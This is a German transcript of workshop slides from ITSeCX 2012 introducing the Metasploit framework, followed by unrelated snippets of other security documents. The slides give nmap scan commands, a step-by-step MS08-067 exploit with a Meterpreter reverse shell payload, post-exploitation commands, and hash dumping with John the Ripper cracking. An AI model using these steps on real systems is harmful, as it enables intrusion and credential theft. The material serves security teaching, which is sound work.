Willkommen zum Security Day 2012

Größe: px
Ab Seite anzeigen:

Download "Willkommen zum Security Day 2012"

Transkript

1 Willkommen zum Security Day 2012 Willkommen zum ITSeCX 2012 Workshop System Exploitation

2 Workshop Überblick Metasploit Framework kennenlernen Awareness und Wissen über moderne Angriffswerkzeuge schärfen hands-on Umgebung Backtrack 5 R1 User: root Password: toor Server-Victim User: Administrator Password: test und Client-Victim User: Administrator Password: admin Hilfestellungen Einzugebende Kommandos finden sich in den Slides Fragen Bitte jederzeit stellen! 2

3

4 Motivation für diesen Workshop Angriffswerkzeug Metasploit vorstellen um daraus Lessons Learned für die Defensive zu ziehen um zu sehen, wie einfach die Verwendung von Exploit Tools mittlerweile sein kann grundlegendes Handling des Werkzeugs vermitteln um sich eigenständig eingehender damit zu beschäftigen um Awareness schaffen zu können einfache Angriffsszenarien darstellen um besseres Verständnis dafür zu bekommen, was alles mit modernen Angriffswerkzeugen (auch automatisiert) möglich ist 3

5 Port- und Vulnerability Scanning Schwachstellen in Netzwerken und Systemen finden netzwerkseitige Vulnerability Scans lokale Vulnerability Scans Vulnerability Scanning Suche nach bekannten Sicherheitsproblemen und Schwachstellen Port Scanning Suche nach offenen, geschlossenen oder gefilterten Ports Operating System Detection Versuch, das Betriebssytem eines Zielsystem (netzwerkseitig) zu identifizieren Service/Version Detection Versuch, den Service/dessen Version an einem offenen Port festzustellen

6 NMAP: Network Mapper NMAP Buch als Standard-Referenz zu Port Scanning

7 NMAP: Network Mapper eines der wenigen real existierenden Tools aus Filmen Yes, even the Matrix runs OpenSSH!!!

8 TCP Port Scanning TCP 3-Way Handshake zum Verbindungsaufbau, TCP-Flags TCP Port offen HOST SYN SYN / ACK ACK SERVER TCP Port geschlossen SYN RST HOST SERVER

9 Scannen nach offenen Ports... nmap -ss -n --reason nmap -su -p n --reason

10 Erkennen des Betriebssystems nmap -O -n --reason nmap -O -n --reason

11 Erkennen der laufenden Services nmap -sv -n --reason

12 Erkennen von Schwachstellen auf laufenden Services nmap --script=exploit -n --reason

13 Exploits und andere Angriffswerkzeuge... zumindest theoretisch seit 1972 bekannt in Computer Security Technology Planning Study von James P. Anderson Problematik grundsätzlich beschrieben praktisch seit mind ein Begriff Morris Worm zur Abmessung der Größe des ARPAnet nutze unterschiedliche bekannte Schwachstellen aus sendmail, finger, rsh/rexec seither Exploit-Code laufend auf Mailing-Listen, Portalen u.ä veröffentlicht 12

14 Exploit Portale gestern heute morgen? bieten Exploits zum Download an Nmap Exploit World (geht zurück auf 1996) K-Otic / FrSirt Milw0rm (geht zurück auf 1998) aktuell: Großteil der Exploit-Portale in Exploit-Database archiviert (www.exploit-database.com) >> Exploit Database (http://www.exploit-db.com/) 13

15 Heute: Exploitation Frameworks Kommerzielle Werkzeuge (meist ab USD lizenzierbar) Immunitysec CANVAS Core Impact Pro Metasploit Pro / Express Open-Source oder freie Werkzeuge Metasploit Framework / Community Inguma winautopwn 14

16 Heute: Exploit Packs und Exploit Kits Exploit Packs enthalten neueste Exploits für populäre Schwachstellen kommerzielle Produkte Meist in Verbindung mit Exploitation Frameworks verwendbar VulnDisco Pack Professional D2 Exploitation Pack Exploit Kits Begriff wird für Tools zum Customizing von Malware verwendet enthalten meist auch Exploit-Sammlungen für neueste Schwachstellen underground ware 15

17 Immunitysec CANVAS verfügt dzt. über ca. 490Exploits monatlich ca. 4 Exploits hinzugefügt Fokus auf folgende Schwachstellen mit Möglichkeit zur Remote Exploitation in mainstream Software alle Plattformen und Applikationen Vorteile Exploits sind getestet bzw. Anpassung kann angefordert werden Support für Tester ist verfügbar graphische Interfaces leiten durch den Angriffsvorgang 16

18 Core Impact Professional verfügt über ca. 700 Exploits monatlich ca Exploits hinzugefügt Fokus auf folgende Schwachstellen mit Möglichkeit zur Remote Exploitation mit Möglichkeit zur Local Exploitation Schwachstellen in Webapplikationen etabliert eigene Methodologie RPT (Rapid Penetration Testing) Tester wird Schritt für Schritt durch den ganzen Vorgang angeleitet alles im graphischen Interface erledigbar Berichtsfunktionalitäten im Produkt inkludiert 17

19 Metasploit verfügt über ca. 758 Exploits Exploits sind Open-Source jeder kann Exploits mit Hilfe des Metasploit Frameworks entwickeln monatlich ca Exploits hinzugefügt user-contributed Code (bedenklich?) gratis oder im Rahmen von Bug Bounty Wettbewerben bereitgestellt in freien und kostenpflichtigen Editionen verfügbar Metasploit Framework ist gemeinsame Basis für alle Editionen 18

20 Metasploit Framework gemeinsame Basis für alle Editionen wesentlicher Nachteil keine webbasierte Oberfläche wie in Express / Community / Pro keine inkludierten Reporting-, Scheduling- oder Automatisierungsmöglichkeiten kein Support, daher auch keine Funktionsgarantien wesentlicher Vorteil tagesaktuell aus dem SVN mit Exploits und Angriffswerkzeugen aktualisierbar frei zugänglich und erweiterbar If it is in metasploit, you should patch it. 21

21 Metasploit Framework eine einfache Umgebung zum Entwickeln von Exploits Metasploit Framework bietet Basisstruktur auf vorhandener Funktionalität des Frameworks kann aufgebaut werden ein Testwerkzeug für unterschiedlichsten Einsatz Metasploit bis Version 2.x in Perl entwickelt, seit 3.x in Ruby 22

22 Metasploit Features Import von Ergebnissen anderer Tools NMAP, Nessus, Rapid7 Nexpose, WebInspect,... Session Management und Scripting Verbindungen zu kompromittierten Systemen werden aufrecht gehalten Automatisierung von Arbeitsschritten ist möglich IDS und Firewall Evasion Veränderung des Traffics zur Umgehung von Firewalls und IDS Pivoting (Tunneling in andere Netzwerke) Post-Exploitation Tools inkludiert nicht nur Angriff, sondern auch Weiterführung des Angriffs erfolgt direkt aus dem Framework 23

23 Metasploit Dokumentation Metasploit ist ein Community-Projekt Dokumentation kommt aus der Community WIKIBOOKS (http://en.wikibooks.org/wiki/metasploit/contents) (http://www.offensive-security.com/metasploit- Metasploit Unleashed unleashed/) 25

24 Metasploit Dokumentation Metasploit ist ein Community-Projekt Dokumentation kommt aus der Community Security Tube Metasploit Megaprimer (http://www.securitytube.net/groups? operation=view&groupid=8) über 5 Stunden Videos zu Verwendung von Metasploit div. Bücher, Magazine, Präsentationen, 26

25 Metasploit Kurse einen echten Metasploit Kurs gibt es nicht das Framework verändert sich laufend mit jedem SVN Checkout kann eine neue Funktion hinzukommen div. sehr gute Online-Kurse beschäftigen sich mit Metasploit sehr intensiv Offensive Security: Penetration Testing with Backtrack 27

26 Aufbau des Metasploit Frameworks Metasploit ist eine Sammlung von Ruby-Bibliotheken div. Tools zur Entwicklung von Exploits Metasploit Dokumentation FRAMEWORK Documentation User Interfaces Modules Exploit Creation Misc. 28

27 Aufbau des Metasploit Frameworks Module stellen die eigentliche Funktionalität des Frameworks MODULES Encoders Exploits Payloads Auxiliary Post 29

28 Which interface to rule them all? msfd Metasploit Framework Daemon Daemon auf Port konzipiert für Zugriff durch mehrere Benutzer entspricht für einzelne Benutzer msfconsole msfcli Metaspoit Framework Command Line Kommandos müssen in einzelner Zeile übergeben werden hauptsächlich für Scripting interessant 30

29 Which interface to rule them all? msfgui Metasploit Framework GUI java-basiertes Interface, kurzzeitig nicht weiterentwickelt worden msfconsole Metasploit Framework Console Command-Line Shell zur Steuerung des Frameworks wahrscheinlich das wichtigste / bevorzugteste Interface für MSF 31

30 Which interface to rule them all? Armitage neuestes GUI für Metasploit sehr einfache Benutzerführung laufend weiterentwickelt Verwendung auch in Teams möglich jeder hat eigenes GUI alle arbeiten auf derselben Metasploit Instanz für Präsentationen zur Awareness- Schaffung sehr gut geeignet! 32

31 cd /pentest/exploits/framework./msfconsole 33

32 help search show info use Befehlsübersicht Module suchen Module anzeigen Modulinformationen anzeigen Modul anwenden 34

33 Mom, where do the exploits come from? stable versions von Metasploit in regelmäßigen Release-Zyklen üblicherweise wird testing branch direkt aus SVN bezogen neueste Exploits neueste Payloads neueste Bugfixes aber: Testing, keine stabile Version (stabile Versionen für Security-Tools?) 1-2 Updates pro Tag machen durchaus Sinn auf jeden Fall immer mit der aktuellsten Revision des Frameworks arbeiten 35

34 Metasploit Modules Exploits Exploit-Module zur Ausnutzung von Schwachstellen müssen mit Payloads kombiniert werden, um sinnvolle Aktionen ausführen zu können unterschiedliche Arten von Exploits Remote Exploits zum Angriff von (Server-)dienste über Netzwerke Local Exploits zur Ausführung von Attacken lokal auf Systemen (zb.: Privilege Escalation) Client-Side Exploits zum Angriff von Clients über Netzwerke (zb.: über Browser) Document Format Exploits zur Erstellung von Dateien (PDF, AVI, MP3,...), welche Schadcode enthalten und Schwachstellen in Programmen ausnutzen 36

35 Metasploit Modules Exploits Unterstützte Plattformen Windows Linux Unix (IRIX, Solaris, AIX, HPUX) OSX Client-side exploits Internet Explorer/Firefox DLL-Hijacking Real Player Document format exploits PDF MS Office Quicktime 37

36 Metasploit Modules Payloads führen Aktionen nach dem Ausnutzen der Schwachstelle aus verschaffen in der Regel dem Angreifer Zugriff auf das System öffnen Listener Ports, auf die Angreifer verbindet (bind_tcp) verbinden sich zum Angreifer zurück (reverse_tcp) tunneln Netzwerkverkehr um Firewalls oder Proxies zu umgehen reverse_http(s) reverse_tcp_dns ermöglichen die Interaktion mit dem Zielsystem über einfache Shells über graphische Oberflächen (VNC) über meterpreter eine spezialisierte Shell, welche weite Teile des Metasploit Frameworks auf das Zielsystem transferiert 39

37 Metasploit Modules Single Payloads in sich abgeschlossene Payloads adduser Adds a user to local admins group (download_)exec (Downloads and) runs a command on the target machine shell_bind_tcp(_xpfw) Provides cmd.exe access via a port listener (after disabling the Windows Firewall) shell_reverse_tcp Makes a connection back to the attacker to provide shell access 40

38 Metasploit Modules Post zur Ausführung von Post Exploitation Angriffen diverse Möglichkeiten bringt das Framework mit Dumpen von Hashes Dumpen von gespeicherten Passwörtern in Applikationen (Browser, 3rd Party Software,...) anlegen von neuen Benutzern Pivoting : Tunneling über den kompromittierten Host in weitere Netzwerke gibt es kein Post Module, bleibt... Scripting in Meterpreter (Ruby) Railgun (direktes Ansprechen der Windows API) 41

39 use exploit/windows/smb/ms08_067_netapi info show show options set RHOST set PAYLOAD windows/meterpreter/reverse_tcp show options set LHOST exploit 43

40 show targets set TARGET 13 exploit 46

41 So it did not work? Functional Exploit Exploit muss getestet sein, um in verschiedenen Environments verlässlich zu funktioneren Hardening Options Betriebssysteme bieten Schutz vor manchen Exploit-Techniken DEP (Data Execution Prevention) ASLR (Address Space Layout Randomization) SEHOP (Structured Exception Handler Protection) Compiler kennen auch Schutzmechanismen ( Stack Cookies ) Betriebssystemversionen (Kernel-Version, Patch-Stand) unterschiedlich kompilierte Binaries zb.: beim Einsatz unterschiedlicher Sprachversionen ( Canaries ) 45

42 Metasploit Meterpreter spezialisierte Shell für Angriffe DLLs werden in kompromittierten Prozess injiziert kein eigener Prozess auf Ziel erkennbar EXPLOIT TARGET Exploited Process daher nicht so einfach zu finden funktioniert nur auf Windows Systemen ATTACKER Meterpreter DLL 47

43 Metasploit Meterpreter Basic commands? / help exit / quit sysinfo : Shows name and OS type of target machine shutdown / reboot reg : Allows reading / writing to the registry of the target machine 48

44 Metasploit Meterpreter Filesystem commands cd : navigate on target machine lcd : navigate on local (attackers) machine pwd / getwd : Shows current directory ls, cat, mkdir, rmdir : All familiar unix style commands download / upload : Move files between local and target machines edit : vi style editor 49

45 Metasploit Meterpreter Metasploit Meterpreter getpid : shows the process ID that meterpreter is running within getuid : shows the user ID that meterpreter is running as ps : Shows active processes kill : kills a process execute : executes a program on the target machine migrate : move meterpreter into the memory of another process Cannot jump to higher priv process Can be useful if you exploit an unstable process 50

46 Metasploit Meterpreter Network Commands ipconfig : shows the interface information portfwd : Sets a local port listener to forward packets through the meterpreter process to other target machines on the target LAN route : displays the targets routing table (add/del/subnet/netmask and gateway options can alter the targets routing table. 51

47 Metasploit Meterpreter help sysinfo screenshot 52

48 Metasploit Meterpreter Scripts erweitern die Funktionalität von Post Modulen können zur Automatisierung von Post-Exploitation verwendet werden run <TAB><TAB> 53

49 Metasploit Meterpreter hashdump (OUTPUT in File hashes.txt schreiben) cd /pentest/password/john john /root/hashes.txt 54

vii Inhaltsverzeichnis 1 Einleitung 1

vii Inhaltsverzeichnis 1 Einleitung 1 vii 1 Einleitung 1 1.1 Was ist das Metasploit-Framework?............................. 2 1.2 Ziel des Buches............................................. 2 1.3 Wer sollte dieses Buch lesen?...................................

Mehr

13.1 Vorbereitungsarbeiten und Bedienung des Frameworks

13.1 Vorbereitungsarbeiten und Bedienung des Frameworks 543 Dieses Kapitel stellt eine Zusammenfassung der häufigsten Tätigkeiten und verwendeten Befehle in Kurzform dar. Diese Darstellung ist nicht vollständig und soll Ihnen in erster Linie wichtige Anhaltspunkte

Mehr

Reale Angriffsszenarien Typische Regellücken bei Firewalls,, Testtools

Reale Angriffsszenarien Typische Regellücken bei Firewalls,, Testtools IT-Sicherheit heute - Angriffe, Schutzmechanismen, Umsetzung Reale Angriffsszenarien Typische Regellücken bei Firewalls,, Testtools jochen.schlichting@secorvo.de Seite 1 Inhalt Einführung: Typische Angriffe

Mehr

German Metasploit Framework Tutorial 16. August 2005 dav

German Metasploit Framework Tutorial 16. August 2005 dav German Metasploit Framework Tutorial 16. August 2005 dav Inhalt 1. Einleitung 2. Exploit Datenbank 2.1. Neue Exploits integrieren 3. Payload Datenbank 4. Konfiguration und Anwendungen eines Exploits 4.1.

Mehr

Breaking Enterprise via XSS

Breaking Enterprise via XSS Michael Messner Senior IT-Security Consultant Fulda, November 2011 Breaking Enterprise via XSS www.integralis.com Agenda Client Sides Was ist Cross Site Scripting (XSS)? Live Demo XSSF Pivoting Privilege

Mehr

Metasploit Framework Unleashed beyond Metasploit

Metasploit Framework Unleashed beyond Metasploit Metasploit Framework Unleashed beyond Metasploit

Mehr

Penetration Testing mit MetaSploit

Penetration Testing mit MetaSploit Penetration Testing mit MetaSploit Stefan Schumacher www.sicherheitsforschung-magdeburg.de Chemnitzer Linux-Tage 2012 Über Mich Direktor des Magdeburger Instituts für Sicherheitsforschung Forschungsprogramme

Mehr

Command-Line. Line-Tools und Unix-Umgebungen Umgebungen unter Windows

Command-Line. Line-Tools und Unix-Umgebungen Umgebungen unter Windows Command-Line Line-Tools und Unix-Umgebungen Umgebungen unter Windows Wie mache ich dem Unix- Sysadmin das Leben einfacher im Umgang mit Windows-Rechnern? Jochen Felten 19.1.2002 Inhalt I.CMD-Tools von

Mehr

Die Architektur von UNIX/Linux- Betriebssystemen. Mag. Lukas Feiler, SSCP lukas.feiler@lukasfeiler.com http://www.lukasfeiler.

Die Architektur von UNIX/Linux- Betriebssystemen. Mag. Lukas Feiler, SSCP lukas.feiler@lukasfeiler.com http://www.lukasfeiler. Die Architektur von UNIX/Linux- Betriebssystemen Mag. Lukas Feiler, SSCP lukas.feiler@lukasfeiler.com http://www.lukasfeiler.com/lectures_brg9 1977: Berkeley Software Distribution/BSD (U.C. Berkeley) 1986:

Mehr

MySQL Queries on "Nmap Results"

MySQL Queries on Nmap Results MySQL Queries on "Nmap Results" SQL Abfragen auf Nmap Ergebnisse Ivan Bütler 31. August 2009 Wer den Portscanner "NMAP" häufig benutzt weiss, dass die Auswertung von grossen Scans mit vielen C- oder sogar

Mehr

WMAP Metasploit 3.2 Module für Pentester von Webapplikationen. OWASP Frankfurt, 25.11.08. The OWASP Foundation http://www.owasp.

WMAP Metasploit 3.2 Module für Pentester von Webapplikationen. OWASP Frankfurt, 25.11.08. The OWASP Foundation http://www.owasp. Germany 2008 Conference http://www.owasp.org/index.php/germany WMAP Metasploit 3.2 Module für Pentester von Webapplikationen Frankfurt, 25.11.08 Hans-Martin Münch it.sec GmbH & Co KG mmuench@it-sec.de

Mehr

p^db=`oj===pìééçêíáåñçêã~íáçå=

p^db=`oj===pìééçêíáåñçêã~íáçå= p^db=`oj===pìééçêíáåñçêã~íáçå= How to Disable User Account Control (UAC) in Windows Vista You are attempting to install or uninstall ACT! when Windows does not allow you access to needed files or folders.

Mehr

Microsoft Azure Fundamentals MOC 10979

Microsoft Azure Fundamentals MOC 10979 Microsoft Azure Fundamentals MOC 10979 In dem Kurs Microsoft Azure Fundamentals (MOC 10979) erhalten Sie praktische Anleitungen und Praxiserfahrung in der Implementierung von Microsoft Azure. Ihnen werden

Mehr

Reale Angriffsszenarien - Überblick

Reale Angriffsszenarien - Überblick IT-Sicherheit heute - Angriffe, Schutzmechanismen, Umsetzung Reale Angriffsszenarien - Überblick kai.jendrian@secorvo.de Security Consulting GmbH, Karlsruhe Seite 1 Inhalt Praxisprobleme Aktuelle Angriffsmethoden

Mehr

Security. Stefan Dahler. 6. Zone Defense. 6.1 Einleitung

Security. Stefan Dahler. 6. Zone Defense. 6.1 Einleitung 6. Zone Defense 6.1 Einleitung Im Folgenden wird die Konfiguration von Zone Defense gezeigt. Sie verwenden einen Rechner für die Administration, den anderen für Ihre Tests. In der Firewall können Sie entweder

Mehr

EEX Kundeninformation 2007-09-05

EEX Kundeninformation 2007-09-05 EEX Eurex Release 10.0: Dokumentation Windows Server 2003 auf Workstations; Windows Server 2003 Service Pack 2: Information bezüglich Support Sehr geehrte Handelsteilnehmer, Im Rahmen von Eurex Release

Mehr

Agieren statt Reagieren - Cybercrime Attacken und die Auswirkungen auf aktuelle IT-Anforderungen. Rafael Cwieluch 16. Juli 2014 @ Starnberger it-tag

Agieren statt Reagieren - Cybercrime Attacken und die Auswirkungen auf aktuelle IT-Anforderungen. Rafael Cwieluch 16. Juli 2014 @ Starnberger it-tag Agieren statt Reagieren - Cybercrime Attacken und die Auswirkungen auf aktuelle IT-Anforderungen Rafael Cwieluch 16. Juli 2014 @ Starnberger it-tag Aktuelle Herausforderungen Mehr Anwendungen 2 2014, Palo

Mehr

BTD Antivirus Evasion: Von der Idee zum PoC. Daniel Sauder SySS GmbH

BTD Antivirus Evasion: Von der Idee zum PoC. Daniel Sauder SySS GmbH BTD Antivirus Evasion: Von der Idee zum PoC Daniel Sauder SySS GmbH WHOAMI IT Security Consultant bei der SySS GmbH Vier Jahre Windows Admin Interesse an Mobile Apps, Web Apps, Windows Hacking u.v.m. OSCP

Mehr

NG-NAC, Auf der Weg zu kontinuierlichem

NG-NAC, Auf der Weg zu kontinuierlichem NG-NAC, Auf der Weg zu kontinuierlichem Monitoring, Sichtbarkeit und Problembehebung 2013 ForeScout Technologies, Page 1 Matthias Ems, Markus Auer, 2014 ForeScout Technologies, Page 1 Director IT Security

Mehr

Ralf M. Schnell. Technical Evangelist Microsoft Deutschland GmbH

Ralf M. Schnell. Technical Evangelist Microsoft Deutschland GmbH Ralf M. Schnell Technical Evangelist Microsoft Deutschland GmbH Was ist Server Core? Warum Server Core? Was kann man damit machen? Was kann man damit nicht machen? Server Core: Installation Server Core:

Mehr

login: password: exit logout Strg+Alt+Backspace passwd passwd $ passwd Changing password for user (current) UNIX password: New UNIX password: Retype new UNIX password: passwd: all authentication tokens

Mehr

Penetrationstests mit Metasploit

Penetrationstests mit Metasploit Michael Kohl Linuxwochenende 2011 24 September 2011 Outline 1 Einleitung 2 Penetration Testing 3 Metasploit 4 Demo 5 Ressourcen Über mich Früher: Linux/Unix Admin / Systems Engineer Jetzt: Rails-Entwickler,

Mehr

German English Firmware translation for T-Sinus 154 Access Point

German English Firmware translation for T-Sinus 154 Access Point German English Firmware translation for T-Sinus 154 Access Point Konfigurationsprogramm Configuration program (english translation italic type) Dieses Programm ermöglicht Ihnen Einstellungen in Ihrem Wireless

Mehr

Einleitung Sniffing, Analyzing, Scanning Scanning. Netzwerke. Bierfert, Feresst, Günther, Schuster. 21. März 2006

Einleitung Sniffing, Analyzing, Scanning Scanning. Netzwerke. Bierfert, Feresst, Günther, Schuster. 21. März 2006 Sniffing, Analyzing, 21. März 2006 Sniffing, Analyzing, Sniffing, Analyzing, Transmission Control Protocol (RFC 793) Zwei Endpunkte, bezeichnet mit Server und Client Server und Client aus je einem geordneten

Mehr

Tutorium Fortgeschrittene

Tutorium Fortgeschrittene Tutorium Fortgeschrittene Netzwerk Einleitung Um sich sicher in einem Netzwerk zu bewegen, muss man es kennen. Zu diesem Zwecke existieren unter Linux einige nützliche Tools, welche es ermöglichen, herauszufinden

Mehr

Exploiting und Trojanisieren

Exploiting und Trojanisieren Exploiting und Trojanisieren Uwe Starke HS-Wismar FB Elektrotechnik und Informatik seit Juli 2000 im CCNA Akademieprogramm November 2001 CCNP-, Februar 2004 NS Demo-Netzwerk-Topologie Standardtopologie

Mehr

Anleitung Command Line Client Demo Client

Anleitung Command Line Client Demo Client Stiftung Auffangeinrichtung BVG Fondation institution supplétive LPP Fondazione istituto collettore LPP Anleitung Command Line Client Demo Client Version 1.1 Inhalt 1. Allgemein... 3 1.1. Installieren

Mehr

Cnlab / CSI 2011. Demo Smart-Phone: Ein tragbares Risiko?

Cnlab / CSI 2011. Demo Smart-Phone: Ein tragbares Risiko? Cnlab / CSI 2011 Demo Smart-Phone: Ein tragbares Risiko? Agenda Demo 45 Schutz der Smart-Phones: - Angriffsszenarien - «Jailbreak» - Was nützt die PIN? - Demo: Zugriff auf Passwörter iphone Bekannte Schwachstellen

Mehr

Git - Fast Version Control System

Git - Fast Version Control System Git - Fast Version Control System Sebastian Harl Astronomisches Institut der Universität Erlangen-Nürnberg 17. Oktober 2008 Was ist Git? VCS (Version Control

Mehr

Löschen eines erkannten aber noch nicht konfigurierten Laufwerks

Löschen eines erkannten aber noch nicht konfigurierten Laufwerks NetWorker - Allgemein Tip 359, Seite 1/6 Löschen eines erkannten aber noch nicht konfigurierten Laufwerks Seit der Version 7.3.0 ist es sehr einfach, vorhandene Sicherungslaufwerke durch den NetWorker

Mehr

Reale Angriffsszenarien Advanced Persistent Threats

Reale Angriffsszenarien Advanced Persistent Threats IT-Sicherheit heute - Angriffe, Schutzmechanismen, Umsetzung Reale Angriffsszenarien Advanced Persistent Threats Jochen.schlichting@secorvo.de Seite 1 APT Ausgangslage Ablauf Abwehr Seite 2 Ausgangslage

Mehr

ANGRIFF. Metasploit Fixing the framework. All diese Automatismen helfen allerdings

ANGRIFF. Metasploit Fixing the framework. All diese Automatismen helfen allerdings ANGRIFF MICHAEL MESSNER Metasploit Fixing the framework Schwierigkeitsgrad: Die praktische Anwendung des Metasploit Exploiting Frameworks bietet enorme Möglichkeiten zur Vereinfachung eines Pentests. Dazu

Mehr

MySQL 101 Wie man einen MySQL-Server am besten absichert

MySQL 101 Wie man einen MySQL-Server am besten absichert MySQL 101 Wie man einen MySQL-Server am besten absichert Simon Bailey simon.bailey@uibk.ac.at Version 1.1 23. Februar 2003 Change History 21. Jänner 2003: Version 1.0 23. Februar 2002: Version 1.1 Diverse

Mehr

Michael Messner www.dpunkt.de/plus

Michael Messner www.dpunkt.de/plus Michael Messner arbeitet als IT Security Consultant bei der Corporate Technology der Siemens AG in München und führt dort technische Sicherheitsanalysen und Penetrationstests durch. Neben der technischen

Mehr

Call Monitor und TAPI mit Outlook & Exchange Integration an Cisco UC540W

Call Monitor und TAPI mit Outlook & Exchange Integration an Cisco UC540W Call Monitor und TAPI mit Outlook & Exchange Metacarp GmbH Geschäftsführer: Alexander Cimen Unter den Eichen 5 (Haus i) 65195 Wiesbaden T: +49 (0) 611 53 1777 55 F: +49 (0) 611 53 1777 51 E: info@metacarp.de

Mehr

Departement Wirtschaft. IT Forensics in action against malicious Software of the newest generation

Departement Wirtschaft. IT Forensics in action against malicious Software of the newest generation Departement Wirtschaft IT Forensics in action against malicious Software of the newest generation Dipl. Ing. Uwe Irmer IT Security- Schnappschüsse 2 Malware der neuesten Generation Professionalität- wer

Mehr

Secure Coding & Live Hacking von Webapplikationen. Conect Informunity 8.3.2011

Secure Coding & Live Hacking von Webapplikationen. Conect Informunity 8.3.2011 Secure Coding & Live Hacking von Webapplikationen Conect Informunity 8.3.2011 Dr. Ulrich Bayer Security Research Sicherheitsforschung GmbH Motivation Datendiebstahl über (Web)-Applikationen passiert täglich

Mehr

Sicheres C Programmieren in Embedded Systemen ARM II (ARM7TMDI [1] ) Wintersemester 2010-2011

Sicheres C Programmieren in Embedded Systemen ARM II (ARM7TMDI [1] ) Wintersemester 2010-2011 Sicheres C in Embedded Systemen ARM II (ARM7TMDI [1] ) Wintersemester 2010-2011 Dipl. Ing. (FH) Ebrecht Roland, Infineon Technologies AG M.Eng (Electronic Systems) Güller Markus, Infineon Technologies

Mehr

Remote Administration von Windows Servern mit Microsoft Terminal Services und OpenSSH

Remote Administration von Windows Servern mit Microsoft Terminal Services und OpenSSH Remote Administration von Windows Servern mit Microsoft Terminal Services und OpenSSH von Dominick Baier (dbaier@ernw.de) und Jens Franke (jfranke@ernw.de) 1 Einleitung Dieses Dokument behandelt die flexible

Mehr

Availability Manager Overview

Availability Manager Overview DECUS Symposium 2007 Availability Manager Overview Günter Kriebel Senior Consultant OpenVMS guenter.kriebel@hp.com GET CONNECTED People. Training. Technology. 2006 Hewlett-Packard Development Company,

Mehr

Neuigkeiten in Microsoft Windows Codename Longhorn. 2006 Egon Pramstrahler - egon@pramstrahler.it

Neuigkeiten in Microsoft Windows Codename Longhorn. 2006 Egon Pramstrahler - egon@pramstrahler.it Neuigkeiten in Microsoft Windows Codename Longhorn Windows Server - Next Generation Derzeit noch Beta Version (aktuelles Build 5308) Weder definitiver Name und Erscheinungstermin sind festgelegt Direkter

Mehr

Administering Microsoft Exchange Server 2016 MOC 20345-1

Administering Microsoft Exchange Server 2016 MOC 20345-1 Administering Microsoft Exchange Server 2016 MOC 20345-1 In diesem 5-tägigen Kurs lernen Sie, wie Sie Exchange Server 2012 administrieren und supporten. Sie erfahren, wie Sie den Exchange Server 2016 installieren

Mehr

Hier folgt eine kurze Aufstellung über die verwendete Architekur. Die Angaben sind ohne Gewähr für Vollständigkeit oder vollständige Richtigkeit.

Hier folgt eine kurze Aufstellung über die verwendete Architekur. Die Angaben sind ohne Gewähr für Vollständigkeit oder vollständige Richtigkeit. 1. ODBC 1.1 Problemstellung Die Informationen über die Microsoft SQL Server Datenbanken sind zur Zeit nicht auf der TIMD Website verfügbar. Der Grund ist, dass kein Interface zur Abfrage der benötigten

Mehr

Netzwerkorientierte Anwendungssicherheit

Netzwerkorientierte Anwendungssicherheit Netzwerkorientierte Anwendungssicherheit Möglichkeiten der Korrelation von Schwachstelleninformationen von Vulnerability Scannern mit Exploit- und Schwachstellendatenbanken Betreuer: Helmut Kaufmann, Bernhard

Mehr

ANGRIFF. Metasploit. Exploiting Framework the basics

ANGRIFF. Metasploit. Exploiting Framework the basics ANGRIFF MICHAEL MESSNER Metasploit Exploiting Framework the basics Schwierigkeitsgrad: Vor allem im professionellen Pentesting Umfeld nehmen Exploiting Frameworks mittlerweile eine nicht mehr wegzudenkende

Mehr

Konzept eines Datenbankprototypen. 30.06.2003 Folie 1 Daniel Gander / Gerhard Schrotter

Konzept eines Datenbankprototypen. 30.06.2003 Folie 1 Daniel Gander / Gerhard Schrotter Konzept eines Datenbankprototypen 30.06.2003 Folie 1 Daniel Gander / Gerhard Schrotter Inhalt (1) Projektvorstellung & Projektzeitplan Softwarekomponenten Detailierte Beschreibung der System Bausteine

Mehr

OEDIV SSL-VPN Portal Access for externals

OEDIV SSL-VPN Portal Access for externals OEDIV SSL-VPN Portal Access for externals Abteilung Serverbetreuung Andre Landwehr Date 31.07.2013 Version 1.2 Seite 1 von 9 Versionshistorie Version Datum Autor Bemerkung 1.0 06.08.2011 A. Landwehr Initial

Mehr

Anleitung zum Prüfen von WebDAV

Anleitung zum Prüfen von WebDAV Anleitung zum Prüfen von WebDAV (BDRS Version 8.010.006 oder höher) Dieses Merkblatt beschreibt, wie Sie Ihr System auf die Verwendung von WebDAV überprüfen können. 1. Was ist WebDAV? Bei der Nutzung des

Mehr

Zehn SSH Tricks. Julius Plen z

Zehn SSH Tricks. Julius Plen z Zehn SSH Tricks Julius Plenz Interaktive Kommandos Steuerung von ssh direkt, nicht dem darin laufenden Programm Escape Sequenzen beginnen mit einer Tilde (~), sind aber nur nach CR wirksam Mögliche Kommandos:

Mehr

Hacker. unberechtigter Zugang zu Systemen und insbesondere: Wie man das verhindert! Situationen

Hacker. unberechtigter Zugang zu Systemen und insbesondere: Wie man das verhindert! Situationen Hacker unberechtigter Zugang zu Systemen und insbesondere: Wie man das verhindert! Situationen physikalischer Zugang möglich im LAN des Opfers außerhalb physikalischer Zugang wie kriegt man den? Diebstahl

Mehr

Von SVN zu Git. Daniel Willmann 2011-10-18 cbna

Von SVN zu Git. Daniel Willmann <daniel@totalueberwachung.de> 2011-10-18 cbna Von SVN zu Git Daniel Willmann 2011-10-18 cbna Inhalt Einführung Git für SVN Benutzer Weitergehende Konzepte Zusammenfassung Daniel Willmann Von SVN zu Git 2 Über den Vortragenden

Mehr

Hackerpraktikum SS 202

Hackerpraktikum SS 202 Hackerpraktikum SS 202 Philipp Schwarte, Lars Fischer Universität Siegen April 17, 2012 Philipp Schwarte, Lars Fischer 1/18 Organisation wöchentliche Übung mit Vorlesungsanteil alle zwei Wochen neue Aufgaben

Mehr

HÄRTUNG VON WEB-APPLIKATIONEN MIT OPEN-SOURCE-SOFTWARE. Münchener Open-Source-Treffen, Florian Maier, 23.05.2014

HÄRTUNG VON WEB-APPLIKATIONEN MIT OPEN-SOURCE-SOFTWARE. Münchener Open-Source-Treffen, Florian Maier, 23.05.2014 HÄRTUNG VON WEB-APPLIKATIONEN MIT OPEN-SOURCE-SOFTWARE Münchener Open-Source-Treffen, Florian Maier, 23.05.2014 ÜBER MICH 34 Jahre, verheiratet Open Source Enthusiast seit 1997 Beruflich seit 2001 Sicherheit,

Mehr

Live Hacking auf eine Citrix Umgebung

Live Hacking auf eine Citrix Umgebung Live Hacking auf eine Citrix Umgebung Ron Ott + Andreas Wisler Security-Consultants GO OUT Production GmbH www.gosecurity.ch GO OUT Production GmbH Gegründet 1999 9 Mitarbeiter Dienstleistungen: 1 Einleitung

Mehr

